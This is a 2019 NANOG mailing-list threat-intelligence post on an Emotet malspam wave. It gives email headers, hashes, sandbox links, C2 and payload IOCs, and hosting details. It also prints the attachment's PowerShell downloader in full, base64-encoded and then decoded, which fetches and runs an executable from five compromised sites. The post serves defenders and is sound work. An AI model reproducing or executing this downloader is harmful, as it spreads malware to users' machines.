29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]

• Previous message (by thread): Anyone from OpenDNS
• Next message (by thread): 29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

*Just an FYI, the obfuscated URLs and IPs below are malicious.*

This is apparently (?) part of a wave of spoofed malspams impersonating messages with ‘weaponized' attachments sent to the NANOG (North American Network Operators Group) mailing list. Background:

https://mailman.nanog.org/pipermail/nanog/2019-May/101140.html

Details:

Date: Wed, 29 May 2019 10:03:04 -0500
From: "NANOG" <Helene.Rouleau at paral.ca>
To: "Paul Ferguson" <fergdawgster at mykolab.com>
Subject: Mykolab Ref Id: I32560
X-Authenticated-Sender: s214.panelboxmanager.com
Return-Path: <Helene.Rouleau at paral.ca>
Attachment: "ATTACHMENT 654860 I32560.doc"

MD5:	49fbc31d5e46d83c4741d64a1c268e8d
SHA-1:	62b00133e2a78063b76a473a9c0b42a00b3042b8
SHA256:	8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5
File Type:	MS Word Document
Magic	CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: North Dakota, Subject: Maine, Author: Darrell Hammes, Comments: Tunisia policy, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 28 12:55:00 2019, Last Saved Time/Date: Tue May 28 12:55:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
SSDeep:	3072:t1b77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qSp8ALPmiuVvbIF/j9G5:Pb77HUUUUUUUUUUUUUUUUUUUT52VP61Z
TRiD:	Microsoft Word document (54.2%)
	Microsoft Word document (old ver.) (32.2%)
	Generic OLE2 / Multistream Compound File (13.5%)
File Size: 136.38 KB

Analysis:
VT: https://www.virustotal.com/#/file/8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5/detection
HA: https://www.hybrid-analysis.com/sample/8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5/5ceea3ee02883814847b23d1
Joe Sandbox: https://www.joesandbox.com/analysis/136644/0/executive
app.anny.run: https://app.any.run/tasks/18d747ef-42d6-40e8-b496-6eb54c5f5dac

Embedded Powershell script does:

 WINWORD.EXE /n "C:\ATTACHMENT654860I32560.doc" (PID: 3256)
powershell.exe powershell -nop -e JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAnADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAaQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYwBlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgAvAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpAGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AHAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwAnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsAJABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcABiAFYAcAApADsAJABpAFkAcABPAFkAYwBMAFYAPQAnAFgAMAA2AGoAUwBSADIANAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAHcAWABwAGIAVgBwACkALgBsAEUAbgBnAFQASAAgAC0AZwBlACAAMgA5ADcAOAAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAFQAQQBSAFQAKAAkAHcAWABwAGIAVgBwACkAOwAkAFYASABUAE8AbwB1AHcAPQAnAEkAXwBXAGsAMgBiAEgAcgAnADsAYgByAGUAYQBrADsAJABFAFgAWABtAEIAbQBYAD0AJwByAGsARgBLAEMAVAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAEEAdQB0AGEAWQA9ACcAWQBuAFYAcQAzAEoASgAnAA== (PID: 2624,Additional Context:
$ClIEYk2='aJNMKF3l';$RwYKCvO = '936';$QBVad9='L8HDzN';$wXpbVp=$env:userprofile+'\'+$RwYKCvO+'.exe';$GAizz7='DOIoST';$Tb9Eu2Ir=.('new-'+'obj'+'ect') Net`.WeBC`L`IENt;$kuW_o7S5='http://ceo.calcus[.]com/postnewo/RwhvOlZIs/@http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/@http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/@http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/@http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'.SPLiT('@');$o7VBQtlb='O1YGb0p';foreach($z3Rv3jv in $kuW_o7S5){try{$Tb9Eu2Ir.DowNLOadFILE($z3Rv3jv, $wXpbVp);$iYpOYcLV='X06jSR24';If ((&('Get-'+'Ite'+'m') $wXpbVp).lEngTH -ge 29780) {[Diagnostics.Process]::START($wXpbVp);$VHTOouw='I_Wk2bHr';break;$EXXmBmX='rkFKCT'}}catch{}}$SAutaY='YnVq3JJ')
    936.exe (PID: 2888) 24/72
    936.exe --26d066e0 (PID: 2932) 24/72
enablerouting.exe (PID: 272)

'Payload quintet' from script above (compromised pages):

http://ceo.calcus[.]com/postnewo/RwhvOlZIs/
http://lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
http://kashmirhackers[.]com/wp-admin/wQXhortSfJ/
http://omegaconsultoriacontabil[.]com.br/site/wAKkbOEwy/
http://nottspcrepair[.]co.uk/nye/hKZlDvPfy/'


Observed network activity:
GET	ceo.calcus[.]com/postnewo/RwhvOlZIs/
GET	lastminutelollipop[.]com/wp-admin/aEQlppdlfo/
POST	31.12.67[.]62:7080/acquire/tlb/ringin/


 Non-authoritative answer:
 Name:	ceo.calcus[.]com
 Address: 68.183.65[.]234

 Non-authoritative answer:
 Name:	lastminutelollipop[.]com
 Address: 158.69.127[.]22

 Non-authoritative answer:
 Name:	kashmirhackers[.]com
 Address: 173.249.2[.]31

 Non-authoritative answer:
 Name:	omegaconsultoriacontabil[.]com.br
 Address: 74.63.242[.]18

 Non-authoritative answer:
 Name:	nottspcrepair[.]co.uk
 Address: 185.38.44[.]163



AS      | IP               | AS Name
14061   | 68.183.65[.]234    | DIGITALOCEAN-ASN - DigitalOcean, LLC, US (shared hosting)
16276   | 158.69.127[.]22    | OVH, FR (shared hosting)
51167   | 173.249.2[.]31     | CONTABO, DE (shared hosting)
46475   | 74.63.242[.]18     | LIMESTONENETWORKS - Limestone Networks, Inc., US (shared hosting)
33182   | 185.38.44[.]163    | DIMENOC - HostDime.com, Inc., US (shared hosting)
44099   | 31.12.67[.]62      | RUNISO-AS RUNISO Autonomous System, FR (appears to be stand-alone IP, no PTR record)


FYI,

- ferg


—
Paul Ferguson
Principal, Threat Intelligence
Gigamon
Seattle, Washington, USA




-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 228 bytes
Desc: Message signed with OpenPGP
URL: <http://mailman.nanog.org/pipermail/nanog/attachments/20190529/fbf244c9/attachment.sig>

• Previous message (by thread): Anyone from OpenDNS
• Next message (by thread): 29 May 2019: Emotet malspam: 'Mykolab Ref Id: I32560' [Was: Re: Spamming of NANOG list members]
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]